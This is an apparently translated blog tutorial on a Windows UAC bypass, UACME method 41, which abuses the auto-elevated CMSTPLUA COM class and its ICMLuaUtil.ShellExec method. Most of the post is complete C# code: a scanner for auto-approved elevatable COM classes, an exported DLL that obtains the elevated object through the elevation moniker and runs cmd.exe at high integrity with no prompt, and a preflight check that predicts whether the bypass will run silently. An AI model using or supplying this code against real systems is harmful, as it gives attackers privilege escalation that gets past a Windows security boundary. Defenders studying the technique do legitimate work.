BypassUAC With ICMLuaUtil


This post walks through a UAC bypass built on method 41 of the UACME project, ICMLuaUtil. The technique relies on a COM component that the system auto-elevates without a consent prompt and that exposes an interface method able to execute commands.

Which COM components can be abused

Below is the UACME project's description of the ICMLuaUtil method:

```
Author: Oddvar Moe
Type: Elevated COM interface
Method: ICMLuaUtil
Target(s): Attacker defined
Component(s): Attacker defined
Implementation: ucmCMLuaUtilShellExecMethod
Works from: Windows 7 (7600)
Fixed in: unfixed ?
How: -
```

Reading the source of that method shows it targets the ICMLuaUtil interface of the CMSTPLUA component. Run OleViewDotNet as administrator to inspect the COM properties of that class.


Right-click the component and open its Elevation properties.

The first condition for abuse is that the Elevation properties show Enabled and Auto Approval both set to True: the class is registered as elevatable, and it is on the list of classes that AppInfo elevates without showing a consent prompt. A class that is only Enabled still triggers the UAC dialog and is useless for a bypass.

The second condition is that the component must expose a method that executes commands. OleViewDotNet shows that the implementation lives in cmlua.dll; with the offsets it provides you can locate the virtual function table and the ShellExec entry in it.
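Both conditions can be checked straight from the registry instead of one class at a time in OleViewDotNet. The following C# console program is an added example, not code from the original post or from UACME: it lists every CLSID whose Elevation\Enabled value is 1 and marks the ones that also appear in the AppInfo auto-approval list at HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList (present on current Windows 10/11 builds; where the key is missing the program assumes nothing is auto-approved). The ElevatedClass and Inventory names and the output format are mine.

```csharp
using System;
using System.Collections.Generic;
using Microsoft.Win32;

namespace ElevatedComInventory
{
    // One elevation-enabled class as found in the registry.
    class ElevatedClass
    {
        public string Clsid;
        public string Name;
        public string Server;
        public bool AutoApproved;
    }

    static class Inventory
    {
        // Elevatable classes:   HKCR\CLSID\{clsid}\Elevation, Enabled (DWORD) = 1
        // Auto-approved classes: HKLM\...\UAC\COMAutoApprovalList, value {clsid} (DWORD) = 1
        // Assumption: if COMAutoApprovalList is absent (older builds), report no auto-approvals.
        const string AutoApprovalPath =
            @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList";

        static HashSet<string> LoadAutoApprovalList()
        {
            var approved = new HashSet<string>(StringComparer.OrdinalIgnoreCase);
            using (RegistryKey hklm = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64))
            using (RegistryKey key = hklm.OpenSubKey(AutoApprovalPath))
            {
                if (key == null) return approved;
                foreach (string clsid in key.GetValueNames())
                {
                    if (Convert.ToInt32(key.GetValue(clsid, 0)) == 1)
                        approved.Add(clsid);
                }
            }
            return approved;
        }

        // Default value of a subkey, or null when the subkey does not exist.
        static string ReadDefault(RegistryKey parent, string subKey)
        {
            using (RegistryKey key = parent.OpenSubKey(subKey))
            {
                return key == null ? null : key.GetValue(null) as string;
            }
        }

        public static List<ElevatedClass> FindElevatedClasses()
        {
            var results = new List<ElevatedClass>();
            HashSet<string> approved = LoadAutoApprovalList();

            // Registry64 view so that a 32-bit build still sees the native CLSID tree, not WOW6432Node.
            using (RegistryKey hkcr = RegistryKey.OpenBaseKey(RegistryHive.ClassesRoot, RegistryView.Registry64))
            using (RegistryKey clsidRoot = hkcr.OpenSubKey("CLSID"))
            {
                foreach (string clsid in clsidRoot.GetSubKeyNames())
                {
                    using (RegistryKey classKey = clsidRoot.OpenSubKey(clsid))
                    {
                        if (classKey == null) continue;
                        using (RegistryKey elevation = classKey.OpenSubKey("Elevation"))
                        {
                            if (elevation == null) continue;
                            if (Convert.ToInt32(elevation.GetValue("Enabled", 0)) != 1) continue;
                        }
                        results.Add(new ElevatedClass
                        {
                            Clsid = clsid,
                            Name = classKey.GetValue("LocalizedString") as string ?? classKey.GetValue(null) as string,
                            Server = ReadDefault(classKey, "InprocServer32") ?? ReadDefault(classKey, "LocalServer32"),
                            AutoApproved = approved.Contains(clsid)
                        });
                    }
                }
            }
            return results;
        }

        static void Main()
        {
            foreach (ElevatedClass c in FindElevatedClasses())
            {
                Console.WriteLine("{0} {1}\n    {2}\n    {3}",
                    c.AutoApproved ? "[AUTO-APPROVED]" : "[prompt]       ",
                    c.Clsid, c.Name, c.Server);
            }
        }
    }
}
```

Only the [AUTO-APPROVED] entries satisfy the first condition; on a machine where OleViewDotNet shows Auto Approval = True for CMSTPLUA, {3E5FC7F9-9A51-4367-9063-A120244FBEC7} is listed that way with cmlua.dll as its in-process server. Whether a listed class also satisfies the second condition (a command-execution method) still has to be checked in its vtable.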

Calling ICMLuaUtil.ShellExec from C# to execute a command

Create a new class library project in Visual Studio and add the DllExport package.

After installation an init.ps1 script runs automatically and opens a dialog for configuring the DLL export settings.

Configure it as shown, click Apply, and Visual Studio will prompt you to reload the project.

Start with the simplest possible DLL: add a reference to System.Windows.Forms and build.

```csharp
using System;
using System.Runtime.InteropServices;
using System.Windows.Forms;

namespace MyBypassUAC
{
    public class Class1
    {
        // [DllExport] is supplied by the DllExport package (it generates the
        // attribute into System.Runtime.InteropServices, so no extra using is
        // needed) and exposes this static method as a native export.
        [DllExport]
        public static void MyBypassUAC()
        {
            MessageBox.Show("aa");
        }
    }
}
```

Note: run the DLL built for the bitness of the system you are on (x86 or x64); loading a DLL of the wrong bitness fails with a module-load error.

Running the x64 DLL pops the message box; that is the whole demo. Next comes the actual bypass.

```csharp
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

namespace MyBypassUAC
{
    public class Class1
    {
        // HRESULT is a 32-bit value in COM. Keeping the enum 32-bit (not long)
        // means the return value of ShellExec marshals correctly on x86 and x64.
        internal enum HRESULT : uint
        {
            S_OK = 0x0000,
            S_FALSE = 0x0001,
            E_INVALIDARG = 0x80070057,
            E_OUTOFMEMORY = 0x8007000E
        }

        // Mirrors the native BIND_OPTS3 layout. pServerInfo is a COSERVERINFO*
        // that stays null here; declaring it as IntPtr keeps the struct blittable
        // and cbStruct equal to the native sizeof(BIND_OPTS3).
        [StructLayout(LayoutKind.Sequential)]
        internal struct BIND_OPTS3
        {
            internal uint cbStruct;
            internal uint grfFlags;
            internal uint grfMode;
            internal uint dwTickCountDeadline;
            internal uint dwTrackFlags;
            internal uint dwClassContext;
            internal uint locale;
            internal IntPtr pServerInfo;
            internal IntPtr hwnd;
        }

        [Flags]
        internal enum CLSCTX
        {
            CLSCTX_INPROC_SERVER = 0x1,
            CLSCTX_INPROC_HANDLER = 0x2,
            CLSCTX_LOCAL_SERVER = 0x4,
            CLSCTX_REMOTE_SERVER = 0x10,
            CLSCTX_NO_CODE_DOWNLOAD = 0x400,
            CLSCTX_NO_CUSTOM_MARSHAL = 0x1000,
            CLSCTX_ENABLE_CODE_DOWNLOAD = 0x2000,
            CLSCTX_NO_FAILURE_LOG = 0x4000,
            CLSCTX_DISABLE_AAA = 0x8000,
            CLSCTX_ENABLE_AAA = 0x10000,
            CLSCTX_FROM_DEFAULT_CONTEXT = 0x20000,
            CLSCTX_INPROC = CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
            CLSCTX_SERVER = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_REMOTE_SERVER,
            CLSCTX_ALL = CLSCTX_SERVER | CLSCTX_INPROC_HANDLER
        }

        // ShellExec takes ULONG (32-bit) fMask and nShow; passing 64-bit values
        // happens to work on x64 but corrupts the stack on x86.
        const uint SEE_MASK_DEFAULT = 0x0;
        const uint SW_SHOW = 0x5;

        // CoGetObject resolves the "Elevation:Administrator!new:{CLSID}" moniker,
        // has AppInfo start the class in an elevated surrogate, and returns the
        // requested interface. PreserveSig = false turns a failing HRESULT into
        // a COMException.
        [DllImport("ole32.dll", CharSet = CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
        [return: MarshalAs(UnmanagedType.Interface)]
        internal static extern object CoGetObject(
          string pszName,
          [In] ref BIND_OPTS3 pBindOptions,
          [In, MarshalAs(UnmanagedType.LPStruct)] Guid riid);

        [DllExport]
        public static void MyBypassUAC()
        {
            Guid classId_cmstplua = new Guid("3E5FC7F9-9A51-4367-9063-A120244FBEC7");      // CLSID of CMSTPLUA
            Guid interfaceId_icmluautil = new Guid("6EDD6D74-C007-4E75-B76A-E5740995E24C"); // IID of ICMLuaUtil

            ICMLuaUtil icm = (ICMLuaUtil)LaunchElevatedCOMObject(classId_cmstplua, interfaceId_icmluautil);
            try
            {
                // ShellExec runs inside the elevated surrogate, so the child
                // process inherits its high-integrity token.
                HRESULT hr = icm.ShellExec(@"cmd.exe", string.Format("/c {0}", "calc"), @"C:\windows\system32\", SEE_MASK_DEFAULT, SW_SHOW);
                if ((uint)hr >= 0x80000000u) // FAILED(hr)
                    Marshal.ThrowExceptionForHR(unchecked((int)hr));
            }
            finally
            {
                Marshal.ReleaseComObject(icm);
            }
        }

        public static object LaunchElevatedCOMObject(Guid Clsid, Guid InterfaceID)
        {
            string CLSID = Clsid.ToString("B");
            string monikerName = "Elevation:Administrator!new:" + CLSID;

            BIND_OPTS3 bo = new BIND_OPTS3();
            bo.cbStruct = (uint)Marshal.SizeOf(bo);
            bo.hwnd = IntPtr.Zero;
            bo.dwClassContext = (uint)CLSCTX.CLSCTX_LOCAL_SERVER;

            return CoGetObject(monikerName, ref bo, InterfaceID);
        }

        // Only ShellExec is called, but vtable order matters: the three IUnknown
        // slots are implied by InterfaceIsIUnknown, and the six placeholders keep
        // ShellExec in its real slot, the tenth entry of the vtable.
        [ComImport, Guid("6EDD6D74-C007-4E75-B76A-E5740995E24C"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
        interface ICMLuaUtil
        {
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method1();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method2();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method3();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method4();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method5();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method6();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            HRESULT ShellExec(
                [In, MarshalAs(UnmanagedType.LPWStr)] string file,
                [In, MarshalAs(UnmanagedType.LPWStr)] string parameters,
                [In, MarshalAs(UnmanagedType.LPWStr)] string directory,
                [In] uint fMask,
                [In] uint nShow);
            // Slots after ShellExec are never called and only kept for completeness.
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method8();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method9();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method10();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method11();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method12();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method13();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method14();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method15();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method16();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method17();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method18();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method19();
            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
            void Method20();
        }
    }
}
```

Creating the ICMLuaUtil object icm through the elevation moniker and calling its ShellExec method runs the command from the elevated surrogate, which is the UAC bypass: the launched process gets a high-integrity token without any consent prompt being shown.
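Whether CoGetObject elevates silently depends on the caller's token and on the UAC policy, which the post does not spell out: the moniker only auto-approves for an administrator running with the filtered (medium integrity) token, and only at the default prompt level. The following preflight check is an added example, my code rather than the post's or UACME's: it reads the token elevation type with GetTokenInformation and the EnableLUA and ConsentPromptBehaviorAdmin policy values, and reports what to expect before the moniker is used. The Preflight class, the verdict strings, and the treatment of the GPO-only prompt levels 1, 3 and 4 as prompting are mine.

```csharp
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;
using System.Security.Principal;
using Microsoft.Win32;

namespace UacPreflight
{
    // TOKEN_ELEVATION_TYPE from winnt.h
    enum TokenElevationType
    {
        Default = 1, // no split token: UAC is off or the user is not an administrator
        Full = 2,    // already running elevated
        Limited = 3  // administrator running with the filtered (medium IL) token
    }

    static class Preflight
    {
        const int TokenElevationTypeClass = 18; // TOKEN_INFORMATION_CLASS.TokenElevationType
        const string PolicyPath = @"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System";

        [DllImport("advapi32.dll", SetLastError = true)]
        static extern bool GetTokenInformation(IntPtr tokenHandle, int tokenInformationClass,
            out int tokenInformation, int tokenInformationLength, out int returnLength);

        public static TokenElevationType GetElevationType()
        {
            // WindowsIdentity.GetCurrent() already holds a token handle opened with query rights.
            IntPtr token = WindowsIdentity.GetCurrent().Token;
            int value, returned;
            if (!GetTokenInformation(token, TokenElevationTypeClass, out value, sizeof(int), out returned))
                throw new Win32Exception(Marshal.GetLastWin32Error());
            return (TokenElevationType)value;
        }

        // Policy values are readable by standard users; a missing value means the default.
        static int ReadPolicy(string name, int fallback)
        {
            using (RegistryKey key = Registry.LocalMachine.OpenSubKey(PolicyPath))
            {
                return key == null ? fallback : Convert.ToInt32(key.GetValue(name, fallback));
            }
        }

        // Explains whether an auto-approved class such as CMSTPLUA will elevate silently
        // for the current caller.
        public static string Verdict()
        {
            int enableLua = ReadPolicy("EnableLUA", 1);
            int adminPrompt = ReadPolicy("ConsentPromptBehaviorAdmin", 5);
            TokenElevationType type = GetElevationType();

            if (enableLua == 0)
                return "UAC is disabled: administrators already run with a full token, nothing to bypass.";
            if (type == TokenElevationType.Full)
                return "Already elevated: the bypass is unnecessary.";
            if (type == TokenElevationType.Default)
                return "No split token: the user is not an administrator, the moniker would prompt for credentials.";
            // From here on the caller is an admin with a filtered token.
            if (adminPrompt == 5 || adminPrompt == 0)
                return "Default level (5) or elevate-without-prompting (0): auto-approved COM classes elevate silently.";
            if (adminPrompt == 2)
                return "Always Notify (2): Windows binaries are not exempt, a consent prompt will appear.";
            // Assumption: the GPO-only levels 1, 3 and 4 also prompt for Windows binaries,
            // since only level 5 exempts them.
            return "ConsentPromptBehaviorAdmin=" + adminPrompt + ": expect a credential or consent prompt.";
        }

        static void Main()
        {
            Console.WriteLine(Verdict());
        }
    }
}
```

Running this from the same medium-integrity context the DLL above will be loaded in tells you in advance whether calc will appear without a dialog; on an Always Notify machine the CoGetObject call still succeeds, but only after the user clicks through the prompt, which defeats the purpose.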


References

1. https://cloud.tencent.com/developer/article/1623517
2. https://github.com/cnsimo/BypassUAC/tree/master/BypassUAC_Dll_csharp
3. https://github.com/Cn33liz/p0wnedShell/blob/master/p0wnedShell/Opsec/p0wnedMasq.cs
4. https://gist.github.com/Moriarty2016/931e86a70aadaf48b067d8a34f28a979

My writing is poor, the wording flippant, the content shallow and the execution clumsy. Corrections and guidance from the masters are welcome, with many thanks.